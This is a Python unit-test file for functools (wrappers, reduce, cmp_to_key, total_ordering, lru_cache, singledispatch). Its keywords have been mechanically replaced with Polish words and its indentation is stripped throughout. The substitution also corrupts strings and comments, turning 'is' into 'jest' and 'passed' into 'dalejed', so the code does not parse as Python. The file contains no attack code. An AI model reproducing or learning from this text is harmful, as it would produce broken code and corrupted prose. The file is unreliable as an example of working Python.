self.assertPrawda(Abstract.add5.__isabstractmethod__)
dla func w [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertNieprawda(getattr(func, '__isabstractmethod__', Nieprawda))
klasa TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
dla name w assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
dla name w updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
dla key w wrapped_attr:
jeżeli name == "__dict__" oraz key == "__wrapped__":
# __wrapped__ jest overwritten by the update code
kontynuuj
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This jest a new annotation'):
"""This jest a test"""
dalej
f.attr = 'This jest also a test'
f.__wrapped__ = "This jest a bald faced lie"
def wrapper(b:'This jest the prior annotation'):
dalej
functools.update_wrapper(wrapper, f)
zwróć wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This jest also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This jest a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted przy -O2 oraz above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This jest a test')
def test_no_update(self):
def f():
"""This jest a test"""
dalej
f.attr = 'This jest also a test'
def wrapper():
dalej
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, Nic)
self.assertEqual(wrapper.__annotations__, {})
self.assertNieprawda(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
dalej
f.attr = 'This jest a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
dalej
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, Nic)
self.assertEqual(wrapper.attr, 'This jest a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
dalej
def wrapper():
dalej
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes dla updating
usuń wrapper.dict_attr
przy self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
przy self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted przy -O2 oraz above")
def test_builtin_update(self):
# Test dla bug #1576241
def wrapper():
dalej
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertPrawda(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
klasa TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This jest a test"""
dalej
f.attr = 'This jest also a test'
f.__wrapped__ = "This jest still a bald faced lie"
@functools.wraps(f)
def wrapper():
dalej
zwróć wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This jest also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted przy -O2 oraz above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This jest a test')
def test_no_update(self):
def f():
"""This jest a test"""
dalej
f.attr = 'This jest also a test'
@functools.wraps(f, (), ())
def wrapper():
dalej
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, Nic)
self.assertNieprawda(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
dalej
f.attr = 'This jest a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
zwróć f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
dalej
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, Nic)
self.assertEqual(wrapper.attr, 'This jest a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
klasa TestReduce(unittest.TestCase):
func = functools.reduce
def test_reduce(self):
klasa Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
zwróć len(self.sofar)
def __getitem__(self, i):
jeżeli nie 0 <= i < self.max: podnieś IndexError
n = len(self.sofar)
dopóki n <= i:
self.sofar.append(n*n)
n += 1
zwróć self.sofar[i]
def add(x, y):
zwróć x + y
self.assertEqual(self.func(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.func(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.func(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.func(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.func(add, Squares(10)), 285)
self.assertEqual(self.func(add, Squares(10), 0), 285)
self.assertEqual(self.func(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.func)
self.assertRaises(TypeError, self.func, 42, 42)
self.assertRaises(TypeError, self.func, 42, 42, 42)
self.assertEqual(self.func(42, "1"), "1") # func jest never called przy one item
self.assertEqual(self.func(42, "", "1"), "1") # func jest never called przy one item
self.assertRaises(TypeError, self.func, 42, (42, 42))
self.assertRaises(TypeError, self.func, add, []) # arg 2 must nie be empty sequence przy no initial value
self.assertRaises(TypeError, self.func, add, "")
self.assertRaises(TypeError, self.func, add, ())
self.assertRaises(TypeError, self.func, add, object())
klasa TestFailingIter:
def __iter__(self):
podnieś RuntimeError
self.assertRaises(RuntimeError, self.func, add, TestFailingIter())
self.assertEqual(self.func(add, [], Nic), Nic)
self.assertEqual(self.func(add, [], 42), 42)
klasa BadSeq:
def __getitem__(self, index):
podnieś ValueError
self.assertRaises(ValueError, self.func, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
klasa SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
jeżeli 0 <= i < self.n:
zwróć i
inaczej:
podnieś IndexError
z operator zaimportuj add
self.assertEqual(self.func(add, SequenceClass(5)), 10)
self.assertEqual(self.func(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.func, add, SequenceClass(0))
self.assertEqual(self.func(add, SequenceClass(0), 42), 42)
self.assertEqual(self.func(add, SequenceClass(1)), 0)
self.assertEqual(self.func(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.func(add, d), "".join(d.keys()))
klasa TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
zwróć (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
zwróć int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
zwróć (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
przy self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs jest nie a K object
przy self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs jest nie a K object
przy self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
przy self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, Nic) # too many args
key = self.cmp_to_key(cmp1)
przy self.assertRaises(TypeError):
key() # too few args
przy self.assertRaises(TypeError):
key(Nic, Nic) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
podnieś ZeroDivisionError
key = self.cmp_to_key(cmp1)
przy self.assertRaises(ZeroDivisionError):
key(3) > key(1)
klasa BadCmp:
def __lt__(self, other):
podnieś ZeroDivisionError
def cmp1(x, y):
zwróć BadCmp()
przy self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
zwróć (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
zwróć y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
zwróć (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) dla value w values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
zwróć y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
klasa TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
jeżeli c_functools:
cmp_to_key = c_functools.cmp_to_key
klasa TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
klasa TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
klasa A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
zwróć self.value < other.value
def __eq__(self, other):
zwróć self.value == other.value
self.assertPrawda(A(1) < A(2))
self.assertPrawda(A(2) > A(1))
self.assertPrawda(A(1) <= A(2))
self.assertPrawda(A(2) >= A(1))
self.assertPrawda(A(2) <= A(2))
self.assertPrawda(A(2) >= A(2))
self.assertNieprawda(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
klasa A:
def __init__(self, value):
self.value = value
def __le__(self, other):
zwróć self.value <= other.value
def __eq__(self, other):
zwróć self.value == other.value
self.assertPrawda(A(1) < A(2))
self.assertPrawda(A(2) > A(1))
self.assertPrawda(A(1) <= A(2))
self.assertPrawda(A(2) >= A(1))
self.assertPrawda(A(2) <= A(2))
self.assertPrawda(A(2) >= A(2))
self.assertNieprawda(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
klasa A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
zwróć self.value > other.value
def __eq__(self, other):
zwróć self.value == other.value
self.assertPrawda(A(1) < A(2))
self.assertPrawda(A(2) > A(1))
self.assertPrawda(A(1) <= A(2))
self.assertPrawda(A(2) >= A(1))
self.assertPrawda(A(2) <= A(2))
self.assertPrawda(A(2) >= A(2))
self.assertNieprawda(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
klasa A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
zwróć self.value >= other.value
def __eq__(self, other):
zwróć self.value == other.value
self.assertPrawda(A(1) < A(2))
self.assertPrawda(A(2) > A(1))
self.assertPrawda(A(1) <= A(2))
self.assertPrawda(A(2) >= A(1))
self.assertPrawda(A(2) <= A(2))
self.assertPrawda(A(2) >= A(2))
self.assertNieprawda(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should nie overwrite existing
@functools.total_ordering
klasa A(int):
dalej
self.assertPrawda(A(1) < A(2))
self.assertPrawda(A(2) > A(1))
self.assertPrawda(A(1) <= A(2))
self.assertPrawda(A(2) >= A(1))
self.assertPrawda(A(2) <= A(2))
self.assertPrawda(A(2) >= A(2))
def test_no_operations_defined(self):
przy self.assertRaises(ValueError):
@functools.total_ordering
klasa A:
dalej
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does nie occur
# when decorated types zwróć NotImplemented
@functools.total_ordering
klasa ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
jeżeli isinstance(other, ImplementsLessThan):
zwróć self.value == other.value
zwróć Nieprawda
def __lt__(self, other):
jeżeli isinstance(other, ImplementsLessThan):
zwróć self.value < other.value
zwróć NotImplemented
@functools.total_ordering
klasa ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
jeżeli isinstance(other, ImplementsGreaterThan):
zwróć self.value == other.value
zwróć Nieprawda
def __gt__(self, other):
jeżeli isinstance(other, ImplementsGreaterThan):
zwróć self.value > other.value
zwróć NotImplemented
@functools.total_ordering
klasa ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
jeżeli isinstance(other, ImplementsLessThanEqualTo):
zwróć self.value == other.value
zwróć Nieprawda
def __le__(self, other):
jeżeli isinstance(other, ImplementsLessThanEqualTo):
zwróć self.value <= other.value
zwróć NotImplemented
@functools.total_ordering
klasa ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
jeżeli isinstance(other, ImplementsGreaterThanEqualTo):
zwróć self.value == other.value
zwróć Nieprawda
def __ge__(self, other):
jeżeli isinstance(other, ImplementsGreaterThanEqualTo):
zwróć self.value >= other.value
zwróć NotImplemented
@functools.total_ordering
klasa ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
jeżeli isinstance(other, ComparatorNotImplemented):
zwróć self.value == other.value
zwróć Nieprawda
def __lt__(self, other):
zwróć NotImplemented
przy self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
przy self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
przy self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
przy self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
przy self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
przy self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
przy self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
przy self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
przy self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
przy self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
przy self.assertRaises(TypeError):
a >= b
przy self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
przy self.assertRaises(TypeError):
a <= b
def test_pickle(self):
dla proto w range(4, pickle.HIGHEST_PROTOCOL + 1):
dla name w '__lt__', '__gt__', '__le__', '__ge__':
przy self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
klasa Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
zwróć self.value < other.value
def __eq__(self, other):
zwróć self.value == other.value
klasa TestLRU:
def test_lru(self):
def orig(x, y):
zwróć 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
dla i w range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertPrawda(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
zwróć 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
dla i w range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
zwróć 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
dla i w range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
zwróć x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
dla x w 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# * * * *
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=Nic)
def fib(n):
jeżeli n < 2:
zwróć n
zwróć fib(n-1) + fib(n-2)
self.assertEqual([fib(n) dla n w range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=Nic, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=Nic, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
zwróć n
dla i w (0, 1):
self.assertEqual([eq(n) dla n w range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=-10, currsize=1))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get dalejed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
dla maxsize w (Nic, 128):
@self.module.lru_cache(maxsize)
def func(i):
zwróć 'abc'[i]
self.assertEqual(func(0), 'a')
przy self.assertRaises(IndexError) jako cm:
func(15)
self.assertIsNic(cm.exception.__context__)
# Verify that the previous exception did nie result w a cached entry
przy self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
dla maxsize w (Nic, 128):
@self.module.lru_cache(maxsize=maxsize, typed=Prawda)
def square(x):
zwróć x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
jeżeli n < 2:
zwróć n
zwróć fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) dla number w range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=Nic)
def fib(n):
jeżeli n < 2:
zwróć n
zwróć fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) dla number w range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=Nic, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=Nic, currsize=0))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
zwróć 42
g = self.module.lru_cache()(f)
dla attr w self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
zwróć 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
dla _ w range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
dla _ w range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
spróbuj:
# create n threads w order to fill cache
threads = [threading.Thread(target=full, args=[k])
dla k w range(n)]
przy support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
jeżeli self.module jest py_functools:
# XXX: Why can be nie equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
inaczej:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads w order to fill cache oraz 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
dla k w range(n)]
start.clear()
przy support.start_threads(threads):
start.set()
w_końcu:
sys.setswitchinterval(orig_si)
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded2(self):
# Simultaneous call przy the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
zwróć 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
dla i w range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) dla k w range(n)]
przy support.start_threads(threads):
dla i w range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
zwróć x
klasa DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
zwróć self.x
def __eq__(self, other):
jeżeli self.x == 2:
test_func(DoubleEq(1))
zwróć self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct zwróć value
def test_early_detection_of_bad_call(self):
# Issue #22184
przy self.assertRaises(TypeError):
@functools.lru_cache
def f():
dalej
def test_lru_method(self):
klasa X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
zwróć x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
dla x w 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
dla x w 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
dla x w 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
klasa TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
klasa TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
klasa TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
zwróć "base"
def g_int(i):
zwróć "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
zwróć "base"
klasa A:
dalej
klasa C(A):
dalej
klasa B(A):
dalej
klasa D(C, B):
dalej
def g_A(a):
zwróć "A"
def g_B(b):
zwróć "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
zwróć "base"
@g.register(int)
def g_int(i):
zwróć "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: w the assert above this jest nie g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
zwróć "Test"
self.assertEqual(g.__name__, "g")
jeżeli sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
zwróć "base"
@g.register(decimal.DecimalException)
def _(obj):
zwróć obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
zwróć "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# Nic of the examples w this test depend on haystack ordering.
c = collections
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
dla haystack w permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping, c.Sized,
c.Iterable, c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, c.OrderedDict]
dla haystack w permutations(bases):
m = mro(c.ChainMap, haystack)
self.assertEqual(m, [c.ChainMap, c.MutableMapping, c.Mapping,
c.Sized, c.Iterable, c.Container, object])
# If there's a generic function przy implementations registered for
# both Sized oraz Container, dalejing a defaultdict to it results w an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
dla haystack w permutations(bases):
m = mro(c.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [c.defaultdict, dict, c.Sized, c.Container,
object])
# MutableSequence below jest registered directly on D. In other words, it
# preceeds MutableMapping which means single dispatch will always
# choose MutableSequence here.
klasa D(c.defaultdict):
dalej
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
dla haystack w permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence,
c.defaultdict, dict, c.MutableMapping,
c.Mapping, c.Sized, c.Iterable, c.Container,
object])
# Container oraz Callable are registered on different base classes oraz
# a generic function supporting both should always pick the Callable
# implementation jeżeli a C instance jest dalejed.
klasa C(c.defaultdict):
def __call__(self):
dalej
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
dla haystack w permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, c.defaultdict, dict, c.Mapping,
c.Sized, c.Iterable, c.Container, object])
def test_register_abc(self):
c = collections
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), Nic}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
zwróć "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
